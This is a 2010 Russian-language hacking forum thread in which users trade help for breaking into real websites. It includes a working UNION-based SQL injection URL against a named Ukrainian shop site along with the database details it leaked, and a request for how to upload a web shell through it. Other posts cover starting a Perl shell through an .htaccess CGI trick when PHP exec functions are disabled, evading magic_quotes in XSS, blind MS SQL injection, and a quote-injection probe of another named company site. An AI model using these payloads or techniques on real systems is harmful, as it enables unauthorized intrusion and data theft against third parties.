07.09.2010, 22:06
|
|
Познающий
Регистрация: 31.05.2009
Сообщений: 68
С нами:
8919750
Репутация:
19
|
|
Нашёл SQLInj:
Код:
http://strob.od.ua/product.php?pod_kod=60000&id=180+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15
Код:
version() 5.0.67-log
user() strob_admin@127.0.0.1
database() strob_product
Как теперь можно залить шелл(не через админку)?
Заранее спасибо, в этой теме 0 почти. |
|
|
07.09.2010, 22:58
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
intNet, вот здесь посмотри:
https://rdot.org/forum/showthread.php?t=352
|
|
|
|
07.09.2010, 23:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
123
Сообщение от brutos
intNet
, вот здесь посмотри:
https://rdot.org/forum/showthread.php?t=352
мдя, brutos ну и где там все условия чтоб лить через иньецию?
нет 2-order inj, mg=on, прав нет у юзверя.
мб знаете какие то "особые условия" brutos , ноу-хау, поделитесь?
Сообщение от Shadrin
есть веб шелл на сервере с
Код:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open
можно ли запустить бекконект с таким набором? perl-скрипт
Сообщение от Shadrin
Strilo4ka
как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?
/showthread.php?t=198119
Сообщение от None
brutos
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.
ок
Сообщение от p0deje
Есть пассивная XSS вида
Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида
пашкеле медаль. )
|
|
|
|
07.09.2010, 23:17
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.
|
|
|
|
08.09.2010, 11:57
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
С нами:
9328846
Репутация:
270
|
|
Strilo4kaкак я запущу перл скрипт если у меня фунции запуска в пхп отрублены?
|
|
|
|
08.09.2010, 13:59
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
Сообщение от None
как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?
залить perl скрипт (а лучше perl шел), попробовать запустить его через web.
также нужно попробовать создать .htaccess
Options +ExecCGI
AddHandler cgi-script pl
у меня иногда прокатывало, особенно не на серьезных серверах/хостингах.
|
|
|
|
08.09.2010, 19:07
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Привет, подскажите как узнать имя базы при слепой MS SQL инъекции (выводится только 1 или 0 при верном или не верном запросе)
И если только брутить то подскажите скрипт или программу для mssql
|
|
|
|
08.09.2010, 22:27
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Сообщение от Redwood
Попробуй MaxPatrol, он фаззит mod_rewrite.
И в довесок почитай вот это: /thread228319.html
очень проблематично найти MaxPatrol.
может посоветуйте альтернативу ?
Acunetix Web Vulnerability Scanner 6 - пойдет?
Просто там каскадное меню и не знаю на сколько правильно "поймет" сканер..
|
|
|
|
08.09.2010, 23:50
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Сообщение от Redwood
http://forum.web-defence.ru/showpost.php?p=2923&postcount=6
Спасибо за прогу.
выбил туда этот сайт. На таблице Request History все время 44:** -200 - 8311 не знаю что это значит.
снял лог, а там только заголовки на всю страницу:
Код:
GET / HTTP/1.1
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host:site.aa.su
Скажу еще, что сайт попасть можно только лишь после авторизации.
|
|
|
|
09.09.2010, 17:39
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 25
С нами:
9221480
Репутация:
55
|
|
http://ru.akella.com/Game.aspx?id=1%27
че дальше, кто подскажет?
не имел никогда дело с aspx-движками.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
